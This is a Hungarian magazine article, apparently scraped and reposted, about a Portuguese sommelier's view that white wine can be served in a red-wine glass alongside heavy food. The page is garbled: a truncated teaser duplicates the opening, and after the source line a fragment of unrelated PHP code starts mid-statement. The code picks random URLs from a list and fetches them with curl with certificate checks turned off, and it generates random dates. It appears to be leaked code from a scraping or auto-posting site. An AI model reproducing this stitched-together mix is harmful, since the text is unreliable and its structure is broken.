-->

Nem mindig hiba, ha nem a megfelelő borospoharat használjuk

A legtöbb alkoholos italnál fontos az etikett: melyik italt, milyen formájú pohárból, mekkora hőmérsékleten fogyasztjuk. A borokra ez különösen jellemző. Egy portugál sommelier, António Lopes azonban felmentést ad a szabályszegőknek. Fotó: Pinterest Hajlamosak vagyunk azon aggódni, vajon megfelelően isszuk-e a bort, ami elénk kerül. Nem csoda, hiszen annyi szabály, norma és hagyomány övezi a borfogyasztást, hogy... Tovább..


A legtöbb alkoholos italnál fontos az etikett: melyik italt, milyen formájú pohárból, mekkora hőmérsékleten fogyasztjuk. A borokra ez különösen jellemző. Egy portugál sommelier, António Lopes azonban felmentést ad a szabályszegőknek.

Fotó: Pinterest

Hajlamosak vagyunk azon aggódni, vajon megfelelően isszuk-e a bort, ami elénk kerül. Nem csoda, hiszen annyi szabály, norma és hagyomány övezi a borfogyasztást, hogy több vaskos etikettkönyvet is megtölt. Nem mindegy, milyen hőmérsékleten fogyasztjuk az italt, milyen formájú pohárból, és milyen étellel párosítjuk. António Lopes, portugál sommelier azonban azt mondja, néha érdemes megszegni a szabályokat és szembe menni a hagyományokkal, mert jó dolgok is kisülhetnek a változ(tat)ásból.

Lopes egy vilamourai étterem, az Emo borszakértője, ahol nem ő kínál bort az ételhez, hanem épp fordítva: a séf a borokhoz komponálja a fogásokat. A sommelier, aki nagyon sokat foglalkozik azzal, mi a megfelelő hőmérséklet és a legtökéletesebb pohár az egyes italok fogyasztásához, kísérletezései során arra jutott, hogy a hagyományos bölcsességek nem minden esetben állják meg a helyüket.

Kép: Pinterest

A fehérboros pohár például jóval keskenyebb szájú, mint a vörösboros pohár. Ez azért van így, mert amikor belekortyolunk az italba, a kisebb nyílás a nyelv közepére irányítja a bort, így jól érzékelteti az ital ízének árnyalatait. Azonban, ha valamilyen nehéz étel, például carbonara mellé szeretnénk fehérbort inni, Lopes szerint érdemes vörösboros pohárból fogyasztani az italt, mert ez kiemeli a bor savas ízét, ezzel frissítő hatást ér el, és enyhít az étel nehézkességén. A széles nyílásnak köszönhetően ugyanis a bor az egész nyelvünket beteríti, elérve az oldalát is, ahol a savakkal teli ízt érzékeljük, valamint levegősebbé is válik az ital, és ez kiemeli a gyümölcsösségét.

Kép: Pinterest

Ray Isle a Food & Wine borokra szakosodott szerkesztője azt mondja, a kísérletezés a poharakkal amolyan „kocka dolog”, de egyre jobban kezd elterjedni. Klasszikus példa a fehérboros pohár használata pezsgőhöz, ami lassan elfogadott lesz a sommelier-k körében.

Forrás: Food & Wine

(Visited 74 times, 1 visits today)

The post Nem mindig hiba, ha nem a megfelelő borospoharat használjuk appeared first on VinCE Magazin.


Source: Vincemagazin HU


html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>